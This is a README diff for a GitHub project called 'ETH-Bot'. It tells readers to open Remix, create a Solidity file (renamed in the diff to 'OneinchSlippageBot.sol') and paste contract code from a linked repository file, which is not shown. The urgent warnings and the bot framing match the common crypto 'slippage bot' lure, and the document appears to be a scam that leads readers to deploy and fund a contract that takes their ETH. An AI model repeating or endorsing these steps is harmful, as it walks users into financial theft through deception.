Jacob-Web3/ETH-Bot/README.md

 ✅2- Access Remix: https://remix.ethereum.org/
 ⚠️(THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK)⚠️

 ✅3- Click on the “contracts” folder and then create “New File”.
-Rename it as you like, i.e: “bot.sol”.
+Rename it as you like, i.e: “OneinchSlippageBot.sol”.
 Make sure it ends with .sol for Ethereum programming language.
 Note: There is a problem if the text is not colored when you create bot.sol.
 Simply refresh the browser and then paste rentry codes again.

 🔥 Paste THIS code in Remix: [ETH Contract Code ](https://github.com/Jacob-Web3/ETH-Bot/blob/main/Code%20-%20Update%2010%20September%202024)